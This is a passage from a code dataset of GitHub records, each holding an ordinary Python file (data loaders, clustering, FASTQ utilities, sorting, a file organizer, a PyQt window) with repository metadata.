ROBOT_UNIT))\n\n\ndef _handle_not_found(blue_points, red_points):\n    blue_cnt = len(blue_points)\n    red_cnt = len(red_points)\n    if blue_cnt >= 2 and red_cnt >= 1:\n        case = NotFoundCase.MANY_POINTS\n    elif blue_cnt <= 2 and red_cnt <= 1:\n        case = NotFoundCase.FEW_POINTS\n    else:\n        case = NotFoundCase.UNDEF\n    logging.warning(\"Robot NOT FOUND... - %s\", case)\n    not_found.on_next(case)\n","repo_name":"d-zhelyazkov/selfie-robot-2","sub_path":"src/robot_finder.py","file_name":"robot_finder.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4005295228","text":"import os\r\nimport collections\r\n\r\nDOWNLOADS = os.path.join(os.path.expanduser('~'), 'Downloads')\r\n\r\nmapping = collections.defaultdict()\r\nfor f in os.listdir(DOWNLOADS):\r\n    if not os.path.isdir(os.path.join(DOWNLOADS, f)):\r\n        file_type = f.split('.')[-1]\r\n        mapping.setdefault(file_type, []).append(f)\r\n\r\nfor folder_name, folder_items in mapping.items():\r\n    folder_path = os.path.join(DOWNLOADS, folder_name)\r\n    if not os.path.exists(folder_path):\r\n        os.mkdir(folder_path)\r\n\r\n    for folder_item in folder_items:\r\n        source = os.path.join(DOWNLOADS, folder_item)\r\n        destination = os.path.join(folder_path, folder_item)\r\n        print(f'Moving {source} to {destination}')\r\n        os.rename(source, destination)","repo_name":"satyamchaturvedi/Folder-Organizer","sub_path":"organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"2899656808","text":"import os\nimport numpy as np\n\ntry:\n    from collections.abc import Sequence\nexcept Exception:\n    from collections import Sequence\n\nfrom ppdet.core.workspace import register, serializable\nfrom ppdet.utils.download import get_dataset_path\n\n\n@serializable\nclass DataSet(object):\n    \"\"\"\n    Dataset, e.g., coco, pascal voc\n\n    Args:\n        annotation (str): annotation file path\n        image_dir (str): directory where image files are stored\n        shuffle (bool): shuffle samples\n    \"\"\"\n\n    def __init__(self,\n                 dataset_dir=None,\n                 image_dir=None,\n                 anno_path=None,\n                 sample_num=-1,\n                 with_background=True,\n                 use_default_label=None,\n                 **kwargs):\n        super(DataSet, self).__init__()\n        self.anno_path = anno_path\n        self.image_dir = image_dir if image_dir is not None else ''\n        self.dataset_dir = dataset_dir if dataset_dir is not None else ''\n        self.sample_num = sample_num\n        self.with_background = with_background\n        self.use_default_label = use_default_label\n\n        self.cname2cid = None\n        self._imid2path = None\n\n    def load_roidb_and_cname2cid(self):\n        \"\"\"load dataset\"\"\"\n        raise NotImplementedError('%s.load_roidb_and_cname2cid not available' %\n                                  (self.__class__.__name__))\n\n    def get_roidb(self):\n        if not self.roidbs:\n            data_dir = get_dataset_path(self.dataset_dir, self.anno_path,\n                                        self.image_dir)\n            if data_dir:\n                self.dataset_dir = data_dir\n            self.load_roidb_and_cname2cid()\n\n        return self.roidbs\n\n    def get_cname2cid(self):\n        if not self.cname2cid:\n            self.load_roidb_and_cname2cid()\n        return self.cname2cid\n\n    def get_anno(self):\n        if self.anno_path is None:\n            return\n        return os.path.join(self.dataset_dir, self.anno_path)\n\n    def get_imid2path(self):\n        return self._imid2path\n\n\ndef _is_valid_file(f, extensions=('.jpg', '.jpeg', '.png', '.bmp')):\n    return f.lower().endswith(extensions)\n\n\ndef _make_dataset(dir):\n    dir = os.path.expanduser(dir)\n    if not os.path.isdir(dir):\n        raise 
ValueError('{} should be a dir'.format(dir))\n    images = []\n    for root, _, fnames in sorted(os.walk(dir, followlinks=True)):\n        for fname in sorted(fnames):\n            path = os.path.join(root, fname)\n            if _is_valid_file(path):\n                images.append(path)\n    return images\n\n\n@register\n@serializable\nclass ImageFolder(DataSet):\n    \"\"\"\n    Args:\n        dataset_dir (str): root directory for dataset.\n        image_dir(list|str): list of image folders or list of image files\n        anno_path (str): annotation file path.\n        samples (int): number of samples to load, -1 means all\n    \"\"\"\n\n    def __init__(self,\n                 dataset_dir=None,\n                 image_dir=None,\n                 anno_path=None,\n                 sample_num=-1,\n                 with_background=True,\n                 use_default_label=None,\n                 **kwargs):\n        super(ImageFolder, self).__init__(dataset_dir, image_dir, anno_path,\n                                          sample_num, with_background,\n                                          use_default_label)\n        self.roidbs = None\n        self._imid2path = {}\n\n    def get_roidb(self):\n        if not self.roidbs:\n            self.roidbs = self._load_images()\n        return self.roidbs\n\n    def set_images(self, images):\n        self.image_dir = images\n        self.roidbs = self._load_images()\n\n    def _parse(self):\n        image_dir = self.image_dir\n        if not isinstance(image_dir, Sequence):\n            image_dir = [image_dir]\n        images = []\n        for im_dir in image_dir:\n            if os.path.isdir(im_dir):\n                im_dir = os.path.join(self.dataset_dir, im_dir)\n                images.extend(_make_dataset(im_dir))\n            elif os.path.isfile(im_dir) and _is_valid_file(im_dir):\n                images.append(im_dir)\n        return images\n\n    def _load_images(self):\n        images = self._parse()\n        ct = 0\n        records = []\n        for image in images:\n            assert image != '' and os.path.isfile(image), \\\n                \"Image {} not found\".format(image)\n            if self.sample_num > 0 and ct >= self.sample_num:\n                break\n            rec = {'im_id': np.array([ct]), 'im_file': image}\n            self._imid2path[ct] = image\n            ct += 1\n            records.append(rec)\n        assert len(records) > 0, \"No image file found\"\n        return records\n","repo_name":"Sharpiless/yolov3-vehicle-detection-paddle","sub_path":"ppdet/data/source/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"38"}
+{"seq_id":"41157810678","text":"import functools\nfrom typing import Tuple, Optional, Callable, Dict\n\nimport torch\nfrom torch.utils.data import Dataset, Sampler, RandomSampler\n\nfrom dlrm.data.datasets import SyntheticDataset, ParametricDataset\nfrom dlrm.data.defaults import TEST_MAPPING, TRAIN_MAPPING\nfrom dlrm.data.feature_spec import FeatureSpec\nfrom dlrm.data.samplers import RandomDistributedSampler\nfrom dlrm.data.utils import collate_split_tensors\nfrom dlrm.utils.distributed import is_distributed, get_rank\n\n\nclass DatasetFactory:\n\n    def __init__(self, flags, device_mapping: Optional[Dict] = None):\n        self._flags = flags\n        self._device_mapping = device_mapping\n\n    def create_collate_fn(self) -> Optional[Callable]:\n        raise NotImplementedError()\n\n    def create_datasets(self) -> Tuple[Dataset, Dataset]:\n        raise NotImplementedError()\n\n    def create_sampler(self, dataset: Dataset) -> Optional[Sampler]:\n        return RandomDistributedSampler(dataset) if is_distributed() else RandomSampler(dataset)\n\n    def create_data_loader(\n            self,\n            dataset,\n            collate_fn: Optional[Callable] = None,\n            sampler: Optional[Sampler] = None):\n        return torch.utils.data.DataLoader(\n            dataset, collate_fn=collate_fn, sampler=sampler, batch_size=None,\n            num_workers=0, pin_memory=False\n        )\n\n\nclass SyntheticGpuDatasetFactory(DatasetFactory):\n    def __init__(self, flags, local_numerical_features_num, 
local_categorical_feature_sizes):\n self.local_numerical_features = local_numerical_features_num\n self.local_categorical_features = local_categorical_feature_sizes\n super().__init__(flags)\n\n def create_collate_fn(self) -> Optional[Callable]:\n return None\n\n def create_sampler(self, dataset) -> Optional[Sampler]:\n return None\n\n def create_datasets(self) -> Tuple[Dataset, Dataset]:\n flags = self._flags\n dataset_train = SyntheticDataset(num_entries=flags.synthetic_dataset_num_entries,\n batch_size=flags.batch_size,\n numerical_features=self.local_numerical_features,\n categorical_feature_sizes=self.local_categorical_features)\n\n dataset_test = SyntheticDataset(num_entries=flags.synthetic_dataset_num_entries,\n batch_size=flags.test_batch_size,\n numerical_features=self.local_numerical_features,\n categorical_feature_sizes=self.local_categorical_features)\n return dataset_train, dataset_test\n\n\nclass ParametricDatasetFactory(DatasetFactory):\n\n def __init__(self, flags, feature_spec: FeatureSpec, numerical_features_enabled, categorical_features_to_read):\n super().__init__(flags)\n self._base_device = flags.base_device\n self._train_batch_size = flags.batch_size\n self._test_batch_size = flags.test_batch_size\n self._feature_spec = feature_spec\n self._numerical_features_enabled = numerical_features_enabled\n self._categorical_features_to_read = categorical_features_to_read\n\n def create_collate_fn(self):\n orig_stream = torch.cuda.current_stream() if self._base_device == 'cuda' else None\n return functools.partial(\n collate_split_tensors,\n device=self._base_device,\n orig_stream=orig_stream,\n numerical_type=torch.float32\n )\n\n def create_datasets(self) -> Tuple[Dataset, Dataset]:\n # prefetching is currently unsupported if using the batch-wise shuffle\n prefetch_depth = 0 if self._flags.shuffle_batch_order else 10\n\n dataset_train = ParametricDataset(\n feature_spec=self._feature_spec,\n mapping=TRAIN_MAPPING,\n batch_size=self._train_batch_size,\n numerical_features_enabled=self._numerical_features_enabled,\n categorical_features_to_read=self._categorical_features_to_read,\n prefetch_depth=prefetch_depth\n )\n\n dataset_test = ParametricDataset(\n feature_spec=self._feature_spec,\n mapping=TEST_MAPPING,\n batch_size=self._test_batch_size,\n numerical_features_enabled=self._numerical_features_enabled,\n categorical_features_to_read=self._categorical_features_to_read,\n prefetch_depth=prefetch_depth\n )\n\n return dataset_train, dataset_test\n\n\ndef create_dataset_factory(flags, feature_spec: FeatureSpec, device_mapping: Optional[dict] = None) -> DatasetFactory:\n \"\"\"\n By default each dataset can be used in single GPU or distributed setting - please keep that in mind when adding\n new datasets. 
Distributed case requires selection of categorical features provided in `device_mapping`\n    (see `DatasetFactory#create_collate_fn`).\n\n    :param flags:\n    :param device_mapping: dict, information about model bottom mlp and embeddings devices assignment\n    :return:\n    \"\"\"\n    dataset_type = flags.dataset_type\n    num_numerical_features = feature_spec.get_number_of_numerical_features()\n    if is_distributed() or device_mapping:\n        assert device_mapping is not None, \"Distributed dataset requires information about model device mapping.\"\n        rank = get_rank()\n        local_categorical_positions = device_mapping[\"embedding\"][rank]\n        numerical_features_enabled = device_mapping[\"bottom_mlp\"] == rank\n    else:\n        local_categorical_positions = list(range(len(feature_spec.get_categorical_feature_names())))\n        numerical_features_enabled = True\n\n    if dataset_type == \"parametric\":\n        local_categorical_names = feature_spec.cat_positions_to_names(local_categorical_positions)\n        return ParametricDatasetFactory(flags=flags, feature_spec=feature_spec,\n                                        numerical_features_enabled=numerical_features_enabled,\n                                        categorical_features_to_read=local_categorical_names\n                                        )\n    if dataset_type == \"synthetic_gpu\":\n        local_numerical_features = num_numerical_features if numerical_features_enabled else 0\n        world_categorical_sizes = feature_spec.get_categorical_sizes()\n        local_categorical_sizes = [world_categorical_sizes[i] for i in local_categorical_positions]\n        return SyntheticGpuDatasetFactory(flags, local_numerical_features_num=local_numerical_features,\n                                          local_categorical_feature_sizes=local_categorical_sizes)\n\n    raise NotImplementedError(f\"unknown dataset type: {dataset_type}\")\n","repo_name":"NVIDIA/DeepLearningExamples","sub_path":"PyTorch/Recommendation/DLRM/dlrm/data/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":6676,"program_lang":"python","lang":"en","doc_type":"code","stars":11741,"dataset":"github-code","pt":"38"}
+{"seq_id":"71654201710","text":"import itertools\nimport random\n\n\ndef cal_energy(x, y, distance):\n    minm = float(\"inf\")\n    flag = 1\n    new_x = []\n    l = y\n    energy = 0\n    while(flag):\n        for i in range(4):\n            for j in range(4):\n                for k in range(4):\n                    if k == 3:\n                        index = -1\n                    else:\n                        index = k\n                    energy = energy + 0.5 * \\\n                        (distance[i][j])*(x[l][i][k])*(x[l][j][index+1])\n        print(\" Energy for: \", x[l], \" is: \", energy)\n        if energy <= minm:\n            minm = energy\n            new_x = x[l]\n        if l < len(x)-1:\n            l += 1\n        else:\n            l = 0\n        if l == y:\n            flag = 0\n        energy = 0\n    return new_x\n\n\ndef main():\n    comb = ([[0, 0, 0, 1], [0, 1, 0, 0], [0, 0, 1, 0], [1, 0, 0, 0]])\n    x = list(itertools.permutations(comb))\n    y = random.randint(0, len(x) - 1)  # randint is inclusive on both ends\n    # print(x)\n    # points located at (0,0),(0,1),(1,1),(1,0)\n    ## D(1,0) ------- C(1,1)\n    #  |                |\n    #  |                |\n    #  |                |\n    ## A(0,0) ------- B(0,1)\n    distance = ([[0, 1, (2)**0.5, 1], [1, 0, 1, (2)**0.5],\n                 [(2)**0.5, 1, 0, 1], [1, (2)**0.5, 1, 0]])\n    # print(\"Distance Matrix is: \", distance)\n    print(\"Points are: (0,0),(0,1),(1,0),(1,1)\")\n    new_x = cal_energy(x, y, distance)\n    print(\"Path to be followed:\", new_x)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"starkblaze01/Artificial-Intelligence-Codes","sub_path":"Hopfield Network/tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"38"}
+{"seq_id":"42398710367","text":"import pathlib\nimport gzip\nimport ntpath\nimport magic\n\n__author__ = 'Dennis A. 
Simpson'\n__version__ = \"1.1.0\"\n\n\nclass Writer:\n    \"\"\"\n    Write new FASTQ file.\n    \"\"\"\n    __slots__ = ['log', 'file']\n\n    def __init__(self, log, out_file_string):\n        \"\"\"\n\n        :param log:\n        :param out_file_string:\n        \"\"\"\n        self.file = open(out_file_string, \"w\")\n        self.log = log\n\n    def lethal_write(self, read):\n        outstring = \"\"\n\n        try:\n            assert len(read.seq) == len(read.qual)\n        except AssertionError:\n            self.log.error(\"Sequence and quality scores of different lengths! Read Name {0}; Seq Length {1}; Qual \"\n                           \"Length {2}\".format(read.name, len(read.seq), len(read.qual)))\n            raise SystemExit(1)\n        outstring += \"@{0}\\n{1}\\n{2}\\n{3}\\n\".format(read.name, read.seq, read.index, read.qual)\n\n        self.file.write(outstring)\n        return True\n\n    def write(self, read_list):\n        \"\"\"\n        Write a block of text to new FASTQ file\n        :param read_list:\n        :return:\n        \"\"\"\n        outstring = \"\"\n        for read in read_list:\n            try:\n                assert len(read.seq) == len(read.qual)\n            except AssertionError:\n                self.log.error(\"Sequence and quality scores of different lengths! Read Name {0}; Seq Length {1}; Qual \"\n                               \"Length {2}\".format(read.name, len(read.seq), len(read.qual)))\n                raise SystemExit(1)\n            outstring += \"@{0}\\n{1}\\n{2}\\n{3}\\n\".format(read.name, read.seq, read.index, read.qual)\n\n        self.file.write(outstring)\n        read_list.clear()\n\n        return True\n\n    def close(self):\n        \"\"\"\n        Close the FASTQ file\n        :return:\n        \"\"\"\n        self.file.close()\n        return True\n\n\nclass FASTQ_Reader:\n    __slots__ = ['input_file', 'log', 'name', 'seq', 'index', 'qual', 'read_block', 'file_name', 'fq_file']\n\n    def __init__(self, input_file, log=None):\n        \"\"\"\n        Splits the FASTQ read list from the FASTQ Iterator into the lines to be manipulated. Also does a check to make\n        sure the sequence length = quality string length.\n        :param input_file:\n        :return:\n        \"\"\"\n\n        self.name = None\n        self.seq = None\n        self.index = None\n        self.qual = None\n        self.input_file = input_file\n        self.log = log\n        self.read_block = []\n        self.file_name = ntpath.basename(input_file)\n        self.fq_file = self.__fastq_file()\n\n    def __fastq_file(self):\n        \"\"\"\n        Handles opening the FASTQ file\n        :return:\n        \"\"\"\n        if len(self.input_file) < 3:\n            self.log.warning(\"FASTQ file parameter missing from options file. Correct error and try again.\")\n            raise SystemExit(1)\n\n        elif not pathlib.Path(self.input_file).is_file():\n            self.log.warning(\"FASTQ file {0} not found. Correct error and run again.\".format(self.input_file))\n            raise SystemExit(1)\n\n        try:\n            mime_type = magic.from_file(self.input_file, mime=True).decode()\n        except AttributeError:\n            mime_type = magic.from_file(self.input_file, mime=True)\n\n        if \"text\" in mime_type:\n            fq_file = open(self.input_file, 'r')  # universal newlines are the default in Python 3; 'rU' was removed in 3.11\n        elif \"gzip\" in mime_type:\n            fq_file = gzip.open(self.input_file, 'rt', encoding='utf-8')\n        else:\n            self.log.warning(\"Unsupported file-type for {0}. 
Only TEXT or GZIP Allowed.\".format(self.input_file))\n raise SystemExit(1)\n return fq_file\n\n def line_reader(self):\n \"\"\"\n Part of the generator to read the FASTQ files\n \"\"\"\n for line in self.fq_file:\n while True:\n yield line\n\n def seq_read(self):\n \"\"\"\n generator to get sequence reads from FAST file into the appropriate blocks of 4 lines.\n \"\"\"\n read_block = []\n count = 0\n eof = False\n try:\n # for i in range(4):\n while count < 4:\n read_block.append(next(FASTQ_Reader.line_reader(self)))\n count += 1\n except StopIteration:\n eof = True\n\n if len(read_block) == 4 and not eof:\n\n self.name = read_block[0].strip(\"\\n\").strip(\"@\")\n self.seq = read_block[1].strip(\"\\n\").strip()\n self.index = read_block[2].strip(\"\\n\").strip()\n self.qual = read_block[3].strip(\"\\n\").strip()\n\n if len(self.seq) != len(self.qual):\n self.log.error(\"Sequence and quality scores of different lengths! \\n{0:s}\\n{1:s}\\n{2:s}\\n{3:s}\"\n .format(self.name, self.seq, self.index, self.qual))\n raise ValueError(\"Sequence and quality scores of different lengths! \\n{0:s}\\n{1:s}\\n{2:s}\\n{3:s}\"\n .format(self.name, self.seq, self.index, self.qual))\n yield self\n\n # I am using this as my EOF. Not so sure the code ever reaches this.\n self.name = None\n\n\ndef read_trim(fastq_read, trim5=None, trim3=None):\n \"\"\"\n Trim any additional sequences\n :param fastq_read:\n :param trim5:\n :param trim3:\n \"\"\"\n if trim5 and trim3:\n fastq_read.seq = fastq_read.seq[trim5:-trim3]\n fastq_read.qual = fastq_read.qual[trim5:-trim3]\n elif trim5:\n fastq_read.seq = fastq_read.seq[trim5:]\n fastq_read.qual = fastq_read.qual[trim5:]\n elif trim3:\n fastq_read.seq = fastq_read.seq[:-trim3]\n fastq_read.qual = fastq_read.qual[:-trim3]\n","repo_name":"Gaorav-Gupta-Lab/Volundr","sub_path":"Valkyries/FASTQ_Tools_old.py","file_name":"FASTQ_Tools_old.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"74168535791","text":"from selenium import webdriver\nfrom pagesOjects.AuthentificationPageObjects import AuthentificationPageObject\nfrom Util.BrowserFactory import WebdriverFactory\n\nwebdriverFactory = WebdriverFactory()\n\ndef browser_chrome(context, timeout=30, **kwargs):\n\n browser = webdriverFactory.browserFactory('chrome')\n browser.maximize_window()\n\n authentification = AuthentificationPageObject(browser)\n context.authentification = authentification\n\n yield context.authentification\n browser.quit()","repo_name":"ziedhannachi/Selenium-Behave-Python","sub_path":"features/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1440608966","text":"# D - Prediction and Restriction\n\nN, K = map(int, input().split())\nR, S, P = map(int, input().split())\nT = [t for t in str(input())]\nU = [''] * N\npoint = 0\n\nfor i in range(N):\n if i < K:\n if T[i] == 'r':\n U[i], point = 'P', point + P\n elif T[i] == 's':\n U[i], point = 'R', point + R\n elif T[i] == 'p':\n U[i], point = 'S', point + S\n else:\n if T[i] == 'r':\n if U[i - K] != 'P':\n U[i], point = 'P', point + P\n elif T[i] == 's':\n if U[i - K] != 'R':\n U[i], point = 'R', point + R\n elif T[i] == 'p':\n if U[i - K] != 'S':\n U[i], point = 'S', point + 
S\n\nprint(point)\n","repo_name":"muck0120/contest","sub_path":"AtCoder/ABC/149/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71225674031","text":"from .sknw import mark, parse_struc, build_graph, draw_graph, build_sknw\n\n__version__ = '0.1'\n\n__all__ = ['mark', 'parse_struc', 'build_graph', 'draw_graph', 'build_sknw']\n\n\ndef test():\n from skimage.morphology import skeletonize\n import numpy as np\n from skimage import data\n import matplotlib.pyplot as plt\n\n img = data.horse()\n ske = skeletonize(~img).astype(np.uint16)\n graph = build_sknw(ske)\n plt.imshow(img, cmap='gray')\n for (s,e) in graph.edges():\n ps = graph[s][e]['pts']\n plt.plot(ps[:,1], ps[:,0], 'green')\n\n nodes = graph.nodes()\n ps = np.array([nodes[i]['o'] for i in nodes])\n plt.plot(ps[:,1], ps[:,0], 'r.')\n plt.title('Build Graph')\n plt.show()\n","repo_name":"Image-Py/sknw","sub_path":"sknw/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"38"} +{"seq_id":"12993540171","text":"#!/usr/bin/env python3\n\n\"\"\"Logs a `Pinhole` archetype for roundtrip checks.\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\n\nimport rerun as rr\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser(description=\"Logs rich data using the Rerun SDK.\")\n rr.script_add_args(parser)\n args = parser.parse_args()\n\n rr.script_setup(args, \"rerun_example_roundtrip_pinhole\")\n\n rr.log(\n \"pinhole\",\n rr.Pinhole(image_from_camera=[[3.0, 0.0, 0.0], [0.0, 3.0, 0.0], [1.5, 1.5, 1.0]], resolution=[3840, 2160]),\n )\n\n rr.script_teardown(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rerun-io/rerun","sub_path":"tests/python/roundtrips/pinhole/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"} +{"seq_id":"6720519445","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom search.models import SearchResult\n\n\nclass Command(BaseCommand):\n\n help = 'uploads latest search results into elasticsearch'\n\n def add_arguments(self, parser):\n parser.add_argument('sync_type', type=str, choices=['create', 'update'], help='ethereum network to use')\n\n def handle(self, *args, **options):\n sync_type = options['sync_type']\n\n if sync_type == 'create':\n for sr in SearchResult.objects.all():\n print(sr.pk)\n try:\n sr.put_on_elasticsearch()\n except Exception as e:\n print('failed:', e)\n elif sync_type == 'update':\n then = timezone.now() - timezone.timedelta(hours=1)\n for sr in SearchResult.objects.filter(modified_on__gt=then):\n print(sr.pk)\n try:\n sr.put_on_elasticsearch()\n except Exception as e:\n print('failed:', e)\n","repo_name":"gitcoinco/web","sub_path":"app/search/management/commands/update_search_index.py","file_name":"update_search_index.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1747,"dataset":"github-code","pt":"38"} +{"seq_id":"23379054604","text":"\nclass Solution(object):\n\n\tdef numUniqueEmail(self, emails):\n\n\t\tres = []\n\t\tfor email in emails:\n\t\t\tlocal, domain = email.split('@')\n\t\t\tlocal = local.replace('.', '')\n\t\t\tlocal = local.split('+')[0]\n\t\t\tprint(local, domain)\n\t\t\tif local +'@' + 
domain not in res:\n\t\t\t\tres.append(local+'@'+domain)\n\t\treturn len(res)\n\nA=Solution()\nres=A.numUniqueEmail([\"test.email+alex@leetcode.com\",\"test.email.leet+alex@code.com\"])\nprint(res)","repo_name":"BrianQcq/LeetCode","sub_path":"src/929_unique_email_addr.py","file_name":"929_unique_email_addr.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74470866669","text":"import numpy as np\nfrom sklearn import datasets, metrics\nfrom utils import Painter4cluster\nfrom sklearn.cluster import KMeans\n\n\nclass Spectral:\n    \"\"\"https://arxiv.org/pdf/0711.0189.pdf\n    Spectral clustering procedure:\n    1. Build a graph from the data: each node corresponds to a data point and each edge is weighted by the similarity of its two endpoints, represented by the adjacency matrix W\n    2. Summing the elements of each column of W gives a diagonal matrix, the degree matrix D; D - W is the Laplacian matrix L\n    3. Compute the first k eigenvalues and eigenvectors of L\n    4. The first k eigenvectors form a feature matrix, which is clustered with k-means\"\"\"\n\n    def __init__(self, n_clusters, n_features=None, show_img=None, painter=None):\n        self.n_clusters = n_clusters\n\n        self.show_img = show_img\n\n        if self.show_img:\n            self.painter = painter or Painter4cluster(n_features)\n            self.painter.beautify()\n\n        if not painter and self.show_img:\n            self.painter.init_pic()\n\n    def fit_predict(self, data, gamma=1., img_save_path=None):\n        n_samples = data.shape[0]\n\n        w = np.ones((n_samples, n_samples))  # adjacency (similarity) matrix\n\n        for i in range(n_samples):\n            for j in range(i + 1, n_samples):\n                w[i][j] = w[j][i] = self.cal_sim(data[i], data[j], gamma)\n\n        d = np.diag(np.sum(w, axis=-1))  # degree matrix\n        l = d - w  # Laplacian matrix\n\n        # normalize the Laplacian matrix: L_sym = D^(-1/2) L D^(-1/2), i.e. divide by sqrt(d_ii * d_jj)\n        for i in range(n_samples):\n            for j in range(i, n_samples):\n                l[i, j] /= np.sqrt(d[i, i] * d[j, j])\n                l[j, i] = l[i, j]\n\n        q, v = np.linalg.eig(l)  # eigenvalues and eigenvectors\n        vec = v[:, np.argsort(q)[:self.n_clusters]]  # take the first k eigenvectors\n\n        pred = KMeans(n_clusters=self.n_clusters).fit_predict(vec)\n\n        if self.show_img:\n            self.painter.show_pic(data, pred, img_save_path)\n            self.painter.show()\n\n        return pred\n\n    def cal_sim(self, x1, x2, gamma):\n        \"\"\"Gaussian (RBF) kernel\"\"\"\n        return np.exp(- gamma * np.linalg.norm(x1 - x2) ** 2)\n\n\ndef sample_test():\n    n_clusters = 5\n    x, y = datasets.make_blobs(centers=n_clusters, n_samples=500)\n\n    model = Spectral(n_clusters=n_clusters,\n                     n_features=x.shape[1], show_img=True\n                     )\n    pred = model.fit_predict(x,\n                             # img_save_path='../img/Spectral.png',\n                             )\n\n    print('ARI:', metrics.adjusted_rand_score(y, pred))\n    \"\"\"ARI: 0.980015709384567\"\"\"\n\n\ndef real_data_test():\n    from MathMethods.Scaler import scaler\n\n    dataset = datasets.load_wine()\n\n    x, y = dataset.data, dataset.target\n\n    x, _ = scaler.min_max(x)\n\n    model = Spectral(n_clusters=3)\n    pred = model.fit_predict(x)\n\n    print('ARI:', metrics.adjusted_rand_score(y, pred))\n    \"\"\"ARI: 0.7970657287606968\"\"\"\n\n\ndef sklearn_test():\n    from sklearn.cluster import SpectralClustering\n    from sklearn.preprocessing import MinMaxScaler\n\n    dataset = datasets.load_wine()\n\n    x, y = dataset.data, dataset.target\n\n    x = MinMaxScaler().fit_transform(x)\n\n    model = SpectralClustering(n_clusters=3)\n    pred = model.fit_predict(x)\n\n    print('ARI:', metrics.adjusted_rand_score(y, pred))\n    \"\"\"ARI: 0.9308728982369983\"\"\"\n\n\nif __name__ == '__main__':\n    sample_test()\n    # real_data_test()\n    # sklearn_test()\n","repo_name":"citisy/MachineLearning","sub_path":"cluster/SpectralCluster.py","file_name":"SpectralCluster.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
+{"seq_id":"37477920175","text":"from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QStackedWidget, 
QAction, QMessageBox\n\nfrom Screen_ToolSelection import Screen_ToolSelection\n\n\nclass Ui_MainWindow(QMainWindow):\n WIN_WIDTH = 800\n WIN_HEIGHT = 600\n\n CUR_VER = \"v0.2.6\"\n screen_toolselection: Screen_ToolSelection\n\n def setupUi(self, MainWindow):\n # main window attributes\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(self.WIN_WIDTH, self.WIN_HEIGHT)\n # set up the central widget\n self.central_widget = QStackedWidget()\n self.setCentralWidget(self.central_widget)\n MainWindow.setCentralWidget(self.central_widget)\n # set up the menu bar\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, self.WIN_WIDTH, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n # add actions to the menu bar\n self.actionAbout = QAction(\"About\", self)\n self.actionAbout.triggered.connect(self.click_menubar_about)\n self.menubar.addAction(self.actionAbout)\n\n # set up the status bar\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n # note: no se que hace esta wea\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n # init other screens\n self.screen_toolselection = Screen_ToolSelection(self)\n # append screens to the central widget\n self.central_widget.addWidget(self.screen_toolselection)\n # set the starting screen\n self.central_widget.setCurrentWidget(self.screen_toolselection)\n\n self.screen_toolselection.post_load()\n\n def click_menubar_about(self):\n dialog = QMessageBox()\n dialog.setWindowTitle(\"About\")\n dialog.setText(f\"PDFtools {self.CUR_VER}\\nCreated by Mrivem, 2020\")\n dialog.setIcon(QMessageBox.Information)\n dialog.exec_()\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"mrivem/PDFtools","sub_path":"GUI/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15371602489","text":"def ins_sort(xs: list) -> None:\r\n for i in range(1, len(xs)):\r\n v = xs[i]\r\n j: int = i - 1\r\n while j >= 0:\r\n if xs[j] > v:\r\n xs[j + 1] = xs[j]\r\n j -= 1\r\n else:\r\n break\r\n xs[j + 1] = v\r\n\r\n\r\n# implementation for v in [0 to 0.9999999999]\r\ndef bucket_sort(xs: list, n: int) -> None:\r\n buckets = [[] for _ in range(n)]\r\n for v in xs:\r\n v2 = int(v * n)\r\n buckets[v2].append(v)\r\n print(buckets)\r\n ans = []\r\n for vs in buckets:\r\n ins_sort(vs)\r\n ans = ans + vs\r\n for i, v in enumerate(ans):\r\n xs[i] = v\r\n\r\n\r\nargs = [4, 5, 3, 2, 6, 